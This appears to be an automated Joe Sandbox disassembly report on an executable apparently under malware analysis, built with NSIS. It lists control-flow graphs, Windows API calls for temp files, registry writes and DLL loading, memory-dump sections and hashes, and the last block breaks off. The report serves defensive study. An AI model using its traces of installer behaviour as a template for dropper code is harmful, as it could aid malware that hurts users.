                                                                                                            control_flow_graph 575 40640a-406415 576 406417-406426 575->576 577 406428-40643e 575->577 576->577 578 406444-406451 577->578 579 406656-40665c 577->579 578->579 582 406457-40645e 578->582 580 406662-40666d 579->580 581 406463-406470 579->581 583 406678-406679 580->583 584 40666f-406673 call 4063e8 580->584 581->580 585 406476-406482 581->585 582->579 584->583 587 406643 585->587 588 406488-4064c6 585->588 591 406651-406654 587->591 592 406645-40664f 587->592 589 4065e6-4065ea 588->589 590 4064cc-4064d7 588->590 593 4065ec-4065f2 589->593 594 40661d-406621 589->594 595 4064f0 590->595 596 4064d9-4064de 590->596 591->579 592->579 597 406602-40660e call 4063e8 593->597 598 4065f4-406600 call 40632f 593->598 600 406630-406641 lstrlenW 594->600 601 406623-40662b call 40640a 594->601 599 4064f7-4064fe 595->599 596->595 602 4064e0-4064e3 596->602 613 406613-406619 597->613 598->613 604 406500-406502 599->604 605 406503-406505 599->605 600->579 601->600 602->595 608 4064e5-4064e8 602->608 604->605 611 406540-406543 605->611 612 406507-40652e call 4062b6 605->612 608->595 609 4064ea-4064ee 608->609 609->599 616 406553-406556 611->616 617 406545-406551 GetSystemDirectoryW 611->617 623 406534-40653b call 40640a 612->623 624 4065ce-4065d1 612->624 613->600 615 40661b 613->615 619 4065de-4065e4 call 40667c 615->619 621 4065c1-4065c3 616->621 622 406558-406566 GetWindowsDirectoryW 616->622 620 4065c5-4065c9 617->620 619->600 620->619 626 4065cb 620->626 621->620 625 406568-406572 621->625 622->621 623->620 624->619 631 4065d3-4065d9 lstrcatW 624->631 628 406574-406577 625->628 629 40658c-4065a2 SHGetSpecialFolderLocation 625->629 626->624 628->629 633 406579-406580 628->633 634 4065a4-4065bb SHGetPathFromIDListW CoTaskMemFree 629->634 635 4065bd 629->635 631->619 637 406588-40658a 633->637 634->620 634->635 635->621 637->620 637->629
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040654B
                                                                                                            • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 004065A8
                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                                                                                            • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                                                                                            • lstrlenW.KERNEL32(Call,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                            • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 717251189-1230650788
                                                                                                            • Opcode ID: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                            • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                                                                                            • Opcode Fuzzy Hash: 05bff3a2d83114fcd993f4ecc25878232afbb7d489ed6444c63e00c36f1e26dc
                                                                                                            • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 638 40176f-401794 call 402c41 call 405d34 643 401796-40179c call 4063e8 638->643 644 40179e-4017b0 call 4063e8 call 405cbd lstrcatW 638->644 649 4017b5-4017b6 call 40667c 643->649 644->649 653 4017bb-4017bf 649->653 654 4017c1-4017cb call 40672b 653->654 655 4017f2-4017f5 653->655 663 4017dd-4017ef 654->663 664 4017cd-4017db CompareFileTime 654->664 657 4017f7-4017f8 call 405eb9 655->657 658 4017fd-401819 call 405ede 655->658 657->658 665 40181b-40181e 658->665 666 40188d-4018b6 call 405450 call 4031d6 658->666 663->655 664->663 667 401820-40185e call 4063e8 * 2 call 40640a call 4063e8 call 405a4e 665->667 668 40186f-401879 call 405450 665->668 680 4018b8-4018bc 666->680 681 4018be-4018ca SetFileTime 666->681 667->653 701 401864-401865 667->701 678 401882-401888 668->678 682 402ace 678->682 680->681 684 4018d0-4018db CloseHandle 680->684 681->684 685 402ad0-402ad4 682->685 687 4018e1-4018e4 684->687 688 402ac5-402ac8 684->688 689 4018e6-4018f7 call 40640a lstrcatW 687->689 690 4018f9-4018fc call 40640a 687->690 688->682 696 401901-4022fc call 405a4e 689->696 690->696 696->685 701->678 702 401867-401868 701->702 702->668
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Iw,?,?,00000031), ref: 004017B0
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Iw,?,?,00000031), ref: 004017D5
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nscEDE4.tmp$C:\Users\user~1\AppData\Local\Temp\nscEDE4.tmp\System.dll$C:\Users\user\AppData\Local\Iw$Call
                                                                                                            • API String ID: 1941528284-499555101
                                                                                                            • Opcode ID: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                            • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                            • Opcode Fuzzy Hash: 45b834d85ef4e1e2ed7d2d31852b9ecb22d19d59077027c4906be829d01ae2f6
                                                                                                            • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 704 40264a-402663 call 402c1f 707 402ac5-402ac8 704->707 708 402669-402670 704->708 709 402ace-402ad4 707->709 710 402672 708->710 711 402675-402678 708->711 710->711 713 4027dc-4027e4 711->713 714 40267e-40268d call 406348 711->714 713->707 714->713 717 402693 714->717 718 402699-40269d 717->718 719 402732-402735 718->719 720 4026a3-4026be ReadFile 718->720 721 402737-40273a 719->721 722 40274d-40275d call 405f61 719->722 720->713 723 4026c4-4026c9 720->723 721->722 724 40273c-402747 call 405fbf 721->724 722->713 732 40275f 722->732 723->713 726 4026cf-4026dd 723->726 724->713 724->722 727 4026e3-4026f5 MultiByteToWideChar 726->727 728 402798-4027a4 call 40632f 726->728 731 4026f7-4026fa 727->731 727->732 728->709 735 4026fc-402707 731->735 737 402762-402765 732->737 735->737 738 402709-40272e SetFilePointer MultiByteToWideChar 735->738 737->728 739 402767-40276c 737->739 738->735 742 402730 738->742 740 4027a9-4027ad 739->740 741 40276e-402773 739->741 744 4027ca-4027d6 SetFilePointer 740->744 745 4027af-4027b3 740->745 741->740 743 402775-402788 741->743 742->732 743->713 746 40278a-402790 743->746 744->713 747 4027b5-4027b9 745->747 748 4027bb-4027c8 745->748 746->718 749 402796 746->749 747->744 747->748 748->713 749->713
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026F1
                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402714
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040272A
                                                                                                              • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FD5
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                            • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                            • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                            • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 750 406752-406772 GetSystemDirectoryW 751 406774 750->751 752 406776-406778 750->752 751->752 753 406789-40678b 752->753 754 40677a-406783 752->754 756 40678c-4067bf wsprintfW LoadLibraryExW 753->756 754->753 755 406785-406787 754->755 755->756
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                            • wsprintfW.USER32 ref: 004067A4
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                            • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                            • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 757 40591f-40596a CreateDirectoryW 758 405970-40597d GetLastError 757->758 759 40596c-40596e 757->759 760 405997-405999 758->760 761 40597f-405993 SetFileSecurityW 758->761 759->760 761->759 762 405995 GetLastError 761->762 762->760
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                            • GetLastError.KERNEL32 ref: 00405976
                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                            • GetLastError.KERNEL32 ref: 00405995
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                            • API String ID: 3449924974-3976562730
                                                                                                            • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                            • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 763 405f0d-405f19 764 405f1a-405f4e GetTickCount GetTempFileNameW 763->764 765 405f50-405f52 764->765 766 405f5d-405f5f 764->766 765->764 767 405f54 765->767 768 405f57-405f5a 766->768 767->768
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\V7OHj6ISEo.exe",004034A3,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004036EF), ref: 00405F46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: "C:\Users\user\Desktop\V7OHj6ISEo.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                                                                                            • API String ID: 1716503409-1380310372
                                                                                                            • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                            • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 769 75561777-755617b6 call 75561b5f 773 755618d6-755618d8 769->773 774 755617bc-755617c0 769->774 775 755617c2-755617c8 call 75562352 774->775 776 755617c9-755617d6 call 75562394 774->776 775->776 781 75561806-7556180d 776->781 782 755617d8-755617dd 776->782 783 7556180f-7556182b call 75562569 call 755615b4 call 75561272 GlobalFree 781->783 784 7556182d-75561831 781->784 785 755617df-755617e0 782->785 786 755617f8-755617fb 782->786 807 75561885-75561889 783->807 790 75561833-7556187c call 755615c6 call 75562569 784->790 791 7556187e-75561884 call 75562569 784->791 788 755617e2-755617e3 785->788 789 755617e8-755617e9 call 75562aac 785->789 786->781 792 755617fd-755617fe call 75562d37 786->792 795 755617e5-755617e6 788->795 796 755617f0-755617f6 call 75562724 788->796 802 755617ee 789->802 790->807 791->807 805 75561803 792->805 795->781 795->789 806 75561805 796->806 802->805 805->806 806->781 811 755618c6-755618cd 807->811 812 7556188b-75561899 call 7556252c 807->812 811->773 817 755618cf-755618d0 GlobalFree 811->817 819 755618b1-755618b8 812->819 820 7556189b-7556189e 812->820 817->773 819->811 822 755618ba-755618c5 call 7556153d 819->822 820->819 821 755618a0-755618a8 820->821 821->819 823 755618aa-755618ab FreeLibrary 821->823 822->811 823->819
                                                                                                            APIs
                                                                                                              • Part of subcall function 75561B5F: GlobalFree.KERNEL32(?), ref: 75561DB2
                                                                                                              • Part of subcall function 75561B5F: GlobalFree.KERNEL32(?), ref: 75561DB7
                                                                                                              • Part of subcall function 75561B5F: GlobalFree.KERNEL32(?), ref: 75561DBC
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 75561825
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 755618AB
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 755618D0
                                                                                                              • Part of subcall function 75562352: GlobalAlloc.KERNEL32(00000040,?), ref: 75562383
                                                                                                              • Part of subcall function 75562724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,755617F6,00000000), ref: 755627F4
                                                                                                              • Part of subcall function 755615C6: wsprintfW.USER32 ref: 755615F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1884142121.0000000075561000.00000020.00000001.01000000.00000004.sdmp, Offset: 75560000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1884110487.0000000075560000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884190450.0000000075564000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1884228003.0000000075566000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_75560000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3962662361-3916222277
                                                                                                            • Opcode ID: 433e0b1f8de4cf33b0669e3b3cfe55b6ff838c9eba9af4a7bb3e92588ddd465d
                                                                                                            • Instruction ID: 9ebefe913e23782308ddc2ef3ba4f3b58cef2b0c624eb6b00c7f7068694fbf94
                                                                                                            • Opcode Fuzzy Hash: 433e0b1f8de4cf33b0669e3b3cfe55b6ff838c9eba9af4a7bb3e92588ddd465d
                                                                                                            • Instruction Fuzzy Hash: 7841E2726002C4ABCB119F74D984BA637B9FF05BA1F144426FD079E186DBB4D085CBE1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 826 402032-40203e 827 402044-40205a call 402c41 * 2 826->827 828 4020fd-4020ff 826->828 839 40206a-402079 LoadLibraryExW 827->839 840 40205c-402068 GetModuleHandleW 827->840 829 40224b-402250 call 401423 828->829 836 402ac5-402ad4 829->836 837 40288b-402892 829->837 837->836 842 40207b-40208a call 406831 839->842 843 4020f6-4020f8 839->843 840->839 840->842 846 4020c5-4020ca call 405450 842->846 847 40208c-402092 842->847 843->829 851 4020cf-4020d2 846->851 849 402094-4020a0 call 401423 847->849 850 4020ab-4020be call 75561777 847->850 849->851 860 4020a2-4020a9 849->860 855 4020c0-4020c3 850->855 851->836 853 4020d8-4020e2 call 403a78 851->853 853->836 859 4020e8-4020f1 FreeLibrary 853->859 855->851 859->836 860->851
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                                                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837461052.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837576644.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_V7OHj6ISEo.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                            • String ID: ($U
                                                                                                            • API String ID: 334405425-603359895
                                                                                                            • Opcode ID: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                            • Instruction ID: 38390b8595ebf5dc4f6cf14c4d4b7ed92d06cc21542818b97b262269bef072d5
                                                                                                            • Opcode Fuzzy Hash: c0091ceae9cfbdad611b36e7acbab474ec2c1bafca6550aebcba3b122e164ceb
                                                                                                            • Instruction Fuzzy Hash: DC218331D00215BACF20AFA5CE4D99E7A70BF04358F60413BF511B51E0DBBD8991DA6E

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 862 4023e4-402415 call 402c41 * 2 call 402cd1 869 402ac5-402ad4 862->869 870 40241b-402425 862->870 872 402427-402434 call 402c41 lstrlenW 870->872 873 402438-40243b 870->873 872->873 876 40243d-40244e call 402c1f 873->876 877 40244f-402452 873->877 876->877 878 402463-402477 RegSetValueExW 877->878 879 402454-40245e call 4031d6 877->879 883 402479 878->883 884 40247c-40255d RegCloseKey 878->884 879->878 883->884 884->869 887 40288b-402892 884->887 887->869
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nscEDE4.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nscEDE4.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user~1\AppData\Local\Temp\nscEDE4.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.1837367574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.1837347196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.1837415453.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
